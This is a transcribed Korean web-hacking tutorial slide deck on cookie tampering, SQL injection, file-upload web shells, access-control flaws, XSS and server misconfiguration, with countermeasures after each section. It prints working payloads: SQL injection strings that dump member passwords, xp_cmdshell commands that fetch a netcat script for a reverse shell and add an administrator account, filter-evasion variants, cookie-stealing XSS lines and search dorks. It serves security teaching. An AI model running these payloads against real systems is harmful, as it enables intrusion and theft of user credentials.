슬라이드 1

Size: px
Start display at page:

Download "슬라이드 1"

Transcription

1 Web Hacking Basic hardsoju

2 Notice 본문서의저작권은저자및 Wise Guys 에게있습니다. 상업적인용도외에어떠한용도 ( 복사, 인용, 수정, 배포 ) 로도사용할수있으며 Wise Guys 의동의없이상업적인목적으로사용됨을금지합니다. 본문서로인해발생한어떠한사건에대한책임도저작권자에게는없음을밝힙니다. 본문서의잘못된부분이나지적이나추가하고싶은내용은저자에게메일을보내기바랍니다.

3 Index Ⅰ 취약한인증및세션관리 Ⅱ입력값검증부재 Ⅲ 취약한접근통제 Ⅳ XSS(Cross Site Scripting) Ⅴ 부적절한환경설정

4 Ⅰ 취약한인증및세션관리 1. 대표적인공격유형 2. 쿠키변조 3. Brute Force 4. Session Hijacking

5 Ⅰ 취약한인증및세션관리 - 웹애플리케이션은사용자들의요청을지속적으로추적하기 위해세션정보를사용하고개별사용자마다독립된세션을 가짐 - 공격자는암호나키, 쿠키, 기타인증관련토큰을공격하여인 증을우회하고다른사용자로위장하거나권한상승시도

6 1. 대표적인공격유형 쿠키조작 Brute Force Session Hijacking

7 2. 쿠키변조 쿠키는클라이언트측에저장되고세션또는서버와정보공유를위한데이터가저장됨 1) 쿠키변조예 Set-Cookie:member_id=hardsoju;path=/ Set-Cookie:member_level=5;path=/ # 변조후 Set-Cookie:member_id=admin;path=/

8 2. 쿠키변조 2) 다양한시도 ID 조작후변화가없다면 member_level 을변경하여 권한상승시도 # 변조후 Set-Cookie:member_level=1;path=/

9 2. 쿠키변조 3) 평문형태의쿠키정보 사용자정보 쿠키에평문형태로저장되는사용자정보는사용자 전환이나권한도용에노출

10 2. 쿠키변조 4) 공격가능성 웹프록시나쿠키모니터링툴을이용하여타겟웹사이트의인증및사용자구분메커니즘을파악한후쿠키를변조하여권한상승이나사용자도용.

11 2. 쿠키변조 5) 대책서버측세션사용하여인증중요정보는쿠키에의존하지않는별도처리메커니즘구현불가피하게사용시암호화

12 3. Brute Force 사전대입법, 추측등에의한무차별대입공격 1) 공격가능성 자동화된 Brute Forcing 툴을이용 (Brutus-AET2, Hydra, Sessions Brute-Forcer) 2) 대책 로그인실패횟수가특정횟수를초과하면계정잠금및 IP 차단

13 4. Session Hijacking Session ID 를스니핑이나추측을통해서도용 1) 세션취약성강력하지못한알고리즘길이가짧은 Session ID 세션타임아웃부재 타임아웃부재

14 4. Session Hijacking 2) 대책 - Session ID를추측불가능하게생성 - Session Timeout 기능 - SSL 통신사용 - 웹페이지요청시마다세션을확인하는메커니즘구현 - 회원정보수정시패스워드를재입력받는구조로, 세션공격에노출되더라도회원정보유출방지

15 Ⅱ 입력값검증부재 1. 대표적인공격유형 2. 파라미터변조 3. 폼필드변조 4. HTTP 헤더변조 5. 히든필드조작 6. sql injection 7. File Upload

16 Ⅱ 입력값검증부재 요청값이웹애플리케이션에서처리되기전에검증이이루어 지지않음 # 종류 URI, GET/POST request, 히든필드, 업로드파일확장자등

17 1. 대표적인공격유형 파라미터변조 폼필드변조 HTTP 헤더변조 히든필드조작 sql injection File Upload

18 2. 파라미터변조 - 사용자구분및인증과관련된부분이 GET/POST string 으로전해질때의취약점 - GET/POST request는변조가능성존재 1) 변조예 # 변조후

19 2. 파라미터변조 ID,PASSWORD 노출 GET 방식처리는웹로그에남기때문에로그파일유출시 계정유출로연결

20 2. 파라미터변조 2) 대책 인증및사용자구분을 request string 에의존하지않게구현 인증처리를위한계정및패스워드폼필드는 POST 방식이용

21 3. 폼필드변조 사용자의입력값을검증하기위한자바스크립트우회 # 대표적인예 회원가입시주민번호검증루틴우회 업로드파일확장자검증루틴우회

22 3. 폼필드변조 1) 우회가능성 - 웹프록시를이용한검증우회 - 소스보기를통한검증우회 (html 로저장하여자바스크립트검증루틴을우회한후폼 태그에서 action 페이지로바로전송 )

23 3. 폼필드변조 2) 웹프록시를이용한검증우회 주민번호검증우회 조작된주민번호

24 3) 대책 3. 폼필드변조 Server Side Script 를이용한검증

25 1) HTTP 헤더? 4. HTTP 헤더변조 사용자와서버간에전송되는정보 2) 문제발생요인 헤더정보기반의인증허용, 접근통제는해당값을변조하여 우회가능성 ex) Referer 정보를신뢰하는사이트에서온것처럼변조

26 4. HTTP 헤더변조 3) 헤더형식 Referer 필드 GET : HTTP 메소드 HTTP Version : 1.0 Accept 필드 : 웹브라우저가서버로부터수신하고하는데이터타입 Referer 필드 : 사용자의접속 URL(

27 4. HTTP 헤더변조 4) 대책 - 사용자로부터전달된값을신뢰해서는안됨 - 반드시인증절차를거쳐웹애플리케이션에서접근을 허용하거나거부하는과정을거치도록구현

28 5. 히든필드조작 1) 히든필드기본형식 <input type= hidden name= 변수명 value= 값 > HTML의일부이기때문에소스보기를통해노출 2) 히든필드변조예 <input type=hidden name= price value= > # 변조후 <input type=hidden name= price value= 350 >

29 3) 히든필드조작하기 5. 히든필드조작 주문가격및마일리지변조 주문정보를히든필드로넘기는취약점

30 4) 히든필드조작결과 5. 히든필드조작 결제금액 : 49 원마일리지 : 1 억

31 5. 히든필드조작 5) 대책 - 중요정보는서버측에서처리 - 해당값의무결성을검사할수있는루틴추가

32 6. SQL Injection 데이터베이스와연동되어있는애플리케이션의입력값을 조작하여의도되지않은결과를반환하도록하는공격기법 공격유형 - 인증우회 - 시스템명령실행 - DB 정보조회

33 6. SQL Injection 1) 인증우회 - 일반적인로그인처리코드 strsql = SELECT user_id, user_pw, name, , homepage FROM member WHERE user_id = &id& AND user_pw = &password& setrs = Dbconn.execute(strSQL) If not Rs.eof then chkuser = true If trim(id) = or trim(password) = then chkuser = false If chkuser then 로그인성공처리부분

34 6. SQL Injection -공격가능성 아이디 : or 1=1-- 비밀번호 : 임의값 아이디 : admin 비밀번호 : or 1=1-- 아이디 : or 1=1-- 비밀번호 : or 1=1

35 6. SQL Injection - 쿼리문주입하기 아이디 : or 1=1-- 비밀번호 : 임의값 SELECT user_id FROM member WHERE user_id = or 1=1 AND password = 임의값 FALSE TRUE 주석처리 TRUE 비밀번호에임의값을입력하여클라이언트사이드스크립트검증을피하고쿼리문상에서는주석처리로인해에러가발생하지않음.

36 - 실제주입되는쿼리문 6. SQL Injection user_id = &id& AND user_pw = &password& or 1=1-- ( 완성되는쿼리구문 ) 아이디 : or 1=1

37 6. SQL Injection - 결과 공격성공시테이블의첫번째에있는계정으로로그인. 일반적으로첫번째계정은관리자이거나테스트계정.

38 - 인증우회패턴 ' or''=' ' or 1=1-- ' or 'a'='a-- 'or'='or' " or 1=1-- " or "a"="a ') or ('a'='a ") or ("a"="a ) or (1=1 or = 6. SQL Injection

39 6. SQL Injection - 구글검색 inurl:login.asp site:net

40 6. SQL Injection 2) 에러메시지를이용한정보획득 - having 절을이용한테이블및컬럼명조회 having 1=1--

41 6. SQL Injection - group by 절을이용한컬럼명조회 group by (user_id)--

42 6. SQL Injection -ID 조회 or 1=(select top 1 user_id from member)--

43 6. SQL Injection - PASSWORD 조회 or 1=(select top 1 user_pw from member)--

44 6. SQL Injection - user name 조회 and user>0--

45 6. SQL Injection -DB 명조회 and 0<>db_name()--

46 6. SQL Injection - 모든 DB 명조회 and 1=(select name from master.dbo.sysdatabases whe re dbid=7)-- dbid 를높여가며조회시모든테이블명획득 (1~6 은 system db)

47 6. SQL Injection - 특정 DB 에서사용자가만든모든테이블명조회 (top 증가 ) and 0<>(select top 1 name from dbo.sysobjects where xtype=char(85))--

48 6. SQL Injection - 모든테이블명조회 (top 증가 ) and (select top 1 cast(name as varchar(8000)) from(select top 37 id, name from [mall]..[sysobjects] where xtype=char(85) order by name asc, id desc)t order by name desc,id asc)>0--

49 6. SQL Injection 3) UNION SQL Injection 비정규화된테이블을연결시킬때사용하는 UNION을이용하여정상적인 select문에공격자가 union select 절을주입하여원하는테이블조회. 똑같은컬럼, 표현식이아니라도자료형과순서만맞으면가능. - 제한조건컬럼의수가같아야한다. 데이터타입이같아야한다. 컬럼의이름이정확해야한다.

50 6. SQL Injection - 제한조건에어긋날경우오류형식 오류메시지를통해컬럼의개수, 타입을추측

51 6. SQL Injection -공격가능성 DB와연동되어 select 문을처리하고, 처리결과를웹페이지로반환해야함.

52 6. SQL Injection - 일반적인우편번호검색쿼리문 strsql="select * from zipcode where dong LIKE '%"& dong &"%' 문제발생지점 - 주입할쿼리문화곡동 %' union select '1','1','1',user_id,user_pw,'1','1' from member--

53 6. SQL Injection - 완성되는공격쿼리문 strsql="select * from zipcode where dong LIKE '%"& dong &"%' union select '1','1','1',user_id,user_pw, '1','1' from member--% 주입된쿼리문 주입된 % 원래의 % %' 를강제삽입하여 LIKE절을마감시키고 UNION을이용하여다른테이블에질의. 원래의 % 는주석처리되어에러가발생하지않음.

54 6. SQL Injection - TABLE NAME 조회화곡동 %' union select '1','1','1',table_name,'1','1','1' from information_schema.tables-- 테이블명

55 6. SQL Injection - COLUM NAME, DATA TYPE 조회화곡동 %' union select '1','1','1',table_name,column_name, data_type,'1' from information_schema.columns where table_name='member'-- 컬럼명 타입

56 6. SQL Injection - MEMBER TABLE 조회화곡동 %' union select '1','1','1',name,user_id,user_pw, '1' from member-- 이름아이디패스워드

57 6. SQL Injection 4) 확장저장프로시저악용공격시나리오 ping 을통한 xp_cmdshell 활성화여부확인 ;exec master..xp_cmdshell ping

58 6. SQL Injection 2 리버스텔넷 ; exec master..xp_cmdshell tftp i get nc.bat & nc.bat -- tftp 로부터 nc.bat 를다운로드하고, nc.bat 는 attack.exe 파일을생성하여공격자 PC 로리버스텔넷

59 6. SQL Injection 공격자는 8080 port listen nc lvp 8080

60 3 DB 접속정보획득 6. SQL Injection

61 6. SQL Injection 4 DB 조회코드작성 방화벽으로인해직접적인접근이불가한경우 DB 접속 정보를분석하여 DB 조회코드를작성 (Server Side Script)

62 6. SQL Injection 5 DB 정보조회 웹으로접근하여회원정보열람 (DB 를획득하는방법은다양함 )

63 6. SQL Injection 공격시나리오 터미널서비스실행화곡동 ;exec master..xp_cmdshell net start terminal services --

64 6. SQL Injection 2 관리자권한계정생성화곡동 ;exec master..xp_cmdshell net user tester 1234 /add -- 화곡동 ;exec master..xp_cmdshell net localgroup administrators tester /add --

65 3 터미널서비스접속 6. SQL Injection

66 6. SQL Injection 공격시나리오 테이블정보덤프화곡동 ;exec sp_makewebtask c: inetpub wwwroot asp dump.html, select * from sysobjects where xtype=''u''--

67 6. SQL Injection 2 회원정보덤프화곡동 ;exec sp_makewebtask c: inetpub wwwroot asp member.html, select * from member --

68 6. SQL Injection 5) 서명기반탐지우회하기 OR 'Simple' = 'Sim'+'ple' OR 'Simple' LIKE 'Sim%' OR 'Simple' IN ('Simple') OR 'Simple' BETWEEN 'R' AND 'T' UNION /**/ SELECT name /**/UNION/**/SELECT/**/name OrigText'/**/OR/**/'Simple'='Simple' UN/**/ION/**/ SE/**/LECT/**/ EXEC('INS'+'ERT INTO ')

69 6. SQL Injection 6) 대책 - 데이터베이스와연동을하는스크립트의모든파라미터점검 - 사용자입력값에특수문자가포함되어있는지검사하여, 제거하거나에러처리 id=replace(id,, ) - SQL 서버의에러메시지를사용자에게보여주지않도록설정 - 데이터베이스사용자의권한제한 - php.ini 설정중 magic_quotes_gpc 값을 On으로설정

70 7. File Upload 1) 확장자필터링우회 asp 파일은업로드불가. 확장자필터링은대소문자조합이나다양한방식으로응용 하여우회가능.

71 7. File Upload 2) 시스템명령실행 웹쉘을업로드하여시스템명령실행 업로드경로가노출되지않는경우디렉토리추측 ex)data, file, files, image, images 등

72 7. File Upload 3) 리버스텔넷

73 7. File Upload 4) 대책 - 업로드디렉토리실행설정제거 - 대소문자조합에대한확장자필터링처리 (Server Side Script) - 업로드확장자허용방식구현 - 업로드된파일이름을임의로변경하여저장

74 Ⅲ 취약한접근통제 1. 대표적인공격유형 2. 접근통제부재 3. URL 강제접속

75 Ⅲ 취약한접근통제 - 특정권한이부여된애플리케이션에공격자가인증과정을거치지않고직접접근 - 개발자가의도한경로나순서에의해접근한다고가정하는디자인, 설계자체의결함 - 공격자는민감한정보를열람하거나허용되지않은작업을수행

76 1. 대표적인공격유형 접근통제부재 URL 강제접속

77 2. 접근통제부재 1) 설계 / 디자인상의결함 - 개발자가생각하는접근단계 view.asp delete_ok.asp list.asp - 공격자가생각하는접근단계 view.asp delete_ok.asp list.asp delete_ok.asp 에서는세션을체크하지않아다른사용자의게시물을삭제할수있음

78 2. 접근통제부재 2) 공격가능성 특정게시물삭제나수정시웹프록시를이용해게시물번호를바꾸게되면해당게시물을변조하거나삭제할수있음. 3) 대책 페이지마다세션비교 게시물수정및삭제시비밀번호확인구조

79 3. URL 강제접속 1) 일반적인관리자페이지 URL 유추

80 3. URL 강제접속 관리자페이지자체에접근하는것만으로권한을얻거나, 인증을요구하더라도 sql injection 취약점등을이용하여우회

81 3. URL 강제접속 2) 공격가능성 인증후나타나는중간페이지에대해인증없이강제접속시도 ex) 일반적인접속과정 ->

82 3. URL 강제접속 3) 구글검색 intitle:admin inurl:com

83 3. URL 강제접속 4) 대책추측하기어려운관리자페이지사용특정네트워크대역이나아이피만접근가능하도록구현웹서버에서의접근제어

84 ⅣXSS(CrossSite Scripting) 1. 대표적인공격유형 2. Session ID, Cookie 가져오기

85 Ⅳ XSS (Cross Site Scripting) - 웹페이지에악의적인스크립트를포함시켜사용자측에서실행되게유도하는공격기법 - 사용자에게입력받은데이터를필터링하지않고그대로동적으로생성된웹페이지에포함하여사용자에게재전송할때발생

86 1. 대표적인공격유형 Session ID, Cookie 가져오기 1 악의적인스크립트게시 5 권한도용 2 스크립트가포함된게시물클릭 3 스크립트실행 4 Session ID, Cookie

87 2. Session ID, Cookie 가져오기 1) XSS 취약성확인 <script>alert( XSS )</script>

88 2. Session ID, Cookie 가져오기 2) 악의적인스크립트게시 스크립트가포함된게시물등록

89 2. Session ID, Cookie 가져오기 3) Session ID 가져오기 게시물을클릭하게되면공격자의서버로 Session ID 전송

90 2. Session ID, Cookie 가져오기 4) 사용자전환및권한도용 웹프록시등의툴을이용하여도용한세션아이디적용

91 2. Session ID, Cookie 가져오기 4) 사용자전환및권한도용 ( 계속 )

92 2. Session ID, Cookie 가져오기 5) 다양한 XSS 패턴 <script>document.location=' kie;</script> <script>url=" n(url,width=0,height=0);</script> <<SCRIPT>document.location=' okie;//<</script> <<SCRIPT>url=" en(url,width=0,height=0);//<</script> <script src= <embed src=" <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.location='

93 2. Session ID, Cookie 가져오기 5) 다양한 XSS 패턴 ( 계속 ) <IMG SRC="jav ascript:document.location=' en='+document.cookie;"> <IMG SRC=jav ascript:url=" ookie;window.open(url,width=0,height=0);> <IMG SRC="jav ascript:document.location=' en='+document.cookie;"> <IMG SRC=jav ascript:url=" ookie;window.open(url,width=0,height=0);> <IMG SRC="jav ascript:document.location=' en='+document.cookie;">

94 2. Session ID, Cookie 가져오기 5) 다양한 XSS 패턴 ( 계속 ) <IMG SRC=jav ascript:url=" ookie;window.open(url,width=0,height=0);> </title><script>document.location=' ment.cookie;</script> <IMG SRC=" alt="bar" onmouseover="javascript:document.location=' oken='+document.cookie">

95 6) 대책 2. Session ID, Cookie 가져오기 - data=replace(data,"<","<") 같은코드를사용하여특수문자가입력되면그의미를상실하고단순히출력되게함 변경전 < > ( ) # & 변경후 < > &#40 &#41 &#35 &#38 - 사용자입력값에대해 HTML encoding 수행후허용된태그만사용하도록필터링 data=server.htmlencode(data) 'HTML 인코딩후 data=replace(data,"<p>","<p>") ' 허용할태그

96 Ⅴ 부적절한환경설정 1. 대표적인공격유형 2. 미등록확장자 3. 디렉토리인덱싱 4. 샘플파일방치

97 Ⅴ 부적절한환경설정 - 웹애플리케이션을운영하는데있어서개발자와시스템 관리자들이실수로놓치게되어발생하는문제 - 기본설정을그대로사용하기때문에발생하는문제

98 1. 대표적인공격유형 미등록확장자 디렉토리인덱싱 샘플파일방치

99 2. 미등록확장자 1) 미등록확장자 특정확장자의파일들이서버에서적절하게처리되지못할경우 소스코드노출 ex) - 개발자가사용하는전용에디터는사용자의편의를위해.bak 이란확장자를사용하는백업파일생성 - 관리자가생성한임시파일및원본과동일한백업파일등

100 2) 백업파일추측하기 2. 미등록확장자 웹페이지명뒤에.bak 등을추가하여추측 DB 접속정보가담긴파일의상대경로및파일명노출

101 3) DB 접속정보획득 2. 미등록확장자

102 2. 미등록확장자 4) 구글검색 inurl:com filetype:bak

103 2. 미등록확장자 5) 대책 - 불필요한파일삭제 - 백업디렉토리는권한설정을통한접근제어

104 3. 디렉토리인덱싱 - 웹브라우저로특정디렉토리를열면그디렉토리에있는모든파일과디렉토리목록나열 - 미리정의된기본 HTML 파일이존재하지않을경우발생 - 공격자에게시스템정보제공

105 3. 디렉토리인덱싱 1) 디렉토리구조및중요파일경로노출

106 3. 디렉토리인덱싱 2) 구글검색 intitle:index.of intext: 이력서

107 3. 디렉토리인덱싱 3) 대책 - IIS 웹사이트등록정보 디렉터리검색 해제

108 3. 디렉토리인덱싱 3) 대책 ( 계속 ) - Apache httpd.conf 파일에서 Indexes 항목제거 <Directory /usr/local/www > Options Indexes 제거 </Directory>

109 3. 디렉토리인덱싱 3) 대책 ( 계속 ) - Tomcat /conf/web.xml 에서 listing 값을 false 로변경 <init-param> <param-name>listing</param-name> <param-value>true</param-value> </init-param> false로변경

110 4. 샘플파일방치 - 웹서버설치후기본적으로제공되는샘플애플리케이션이나 설정파일은외부에공개되기쉽고, 공격자에게시스템의정보 를제공함 ex) phpinfo.php - 대책정상작동유무만을점검한후제거시스템설정과관련된애플리케이션은별도디렉터리생성하여운용

111 Q & A

112 참고자료 웹해킹패턴과대응 - 황순일, 김광진웹보안-최경철정보보안개론과실습 양대일, 김경곤홈페이지개발보안가이드 KISA XSS(Cross Site Scripting) Cheat Sheet RSnake SQL Server 2000 정원혁네이버용어사전 naver.com /* 출처가불분명한다수의인터넷자료를참고하였음 */

문서 템플릿

문서 템플릿 HDSI 툴분석 [sql injection 기술명세서 ] Sql injection 기술명세서 Ver. 0.01 이문서는 sql injection 기술명세가범위입니다. Copyrights Copyright 2009 by CanvasTeam@SpeeDroot( 장경칩 ) All Rights Reserved. 장경칩의사전승인없이본내용의전부또는일부에대한복사, 전재,

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc 분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.

More information

PowerPoint Template

PowerPoint Template JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것

More information

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments

More information

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc Asp Mssql Sql Injection Tool 분석보고서 이재곤 (x0saver@gmail.com) SK Infosec Co., Inc MSS 사업본부 / 침해대응센터모의해킹파트 Table of Contents 1. 개요... 3 2. 구성... 3 3. 분석... 4 3.1. 기능분석... 4 4. 공격원리...14 4.1 기본공격원리...14 4.2

More information

Observational Determinism for Concurrent Program Security

Observational Determinism for  Concurrent Program Security 웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구

More information

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 해킹의 종류 웹해킹 네트워크 해킹 시스템(OS)해킹 웹해킹 기법 SQL INJECTION HTML INJECTION Cross Site Scripting HEADER INJECTION 웹해킹 기법 업로드 취약점 다운로드 취약점 INJECTION 나는 사람입니다. 나는

More information

untitled

untitled Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port

More information

Microsoft PowerPoint - 10Àå.ppt

Microsoft PowerPoint - 10Àå.ppt 10 장. DB 서버구축및운영 DBMS 의개념과용어를익힌다. 간단한 SQL 문법을학습한다. MySQL 서버를설치 / 운영한다. 관련용어 데이터 : 자료 테이블 : 데이터를표형식으로표현 레코드 : 테이블의행 필드또는컬럼 : 테이블의열 필드명 : 각필드의이름 데이터타입 : 각필드에입력할값의형식 학번이름주소연락처 관련용어 DB : 테이블의집합 DBMS : DB 들을관리하는소프트웨어

More information

제목 레이아웃

제목 레이아웃 웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya

More information

Microsoft Word - src.doc

Microsoft Word - src.doc IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...

More information

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the

More information

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

untitled

untitled 웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는

More information

로거 자료실

로거 자료실 redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...

More information

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection

More information

AhnLab_template

AhnLab_template 해킹과침해대응 웹해킹과대응 2013. 10. 17 ( 목 ) 안랩 ASEC 대응팀문영조 Contents 01 웹해킹과취약점 02 웹해킹기법에대한이해 03 웹해킹과침해대응 04 결론 01 웹해킹과취약점 개요 01. 웹해킹과취약점 < 출처 - IBM X-Force 2012 Annual Trend & Risk Report> 4 개요 01. 웹해킹과취약점 웹해킹 (Web

More information

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.

More information

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher( 실행할페이지.jsp); 다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher

More information

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

DBMS & SQL Server Installation Database Laboratory

DBMS & SQL Server Installation Database Laboratory DBMS & 조교 _ 최윤영 } 데이터베이스연구실 (1314 호 ) } 문의사항은 cyy@hallym.ac.kr } 과제제출은 dbcyy1@gmail.com } 수업공지사항및자료는모두홈페이지에서확인 } dblab.hallym.ac.kr } 홈페이지 ID: 학번 } 홈페이지 PW:s123 2 차례 } } 설치전점검사항 } 설치단계별설명 3 Hallym Univ.

More information

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아 LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml

More information

Microsoft PowerPoint - GUI _DB연동.ppt [호환 모드]

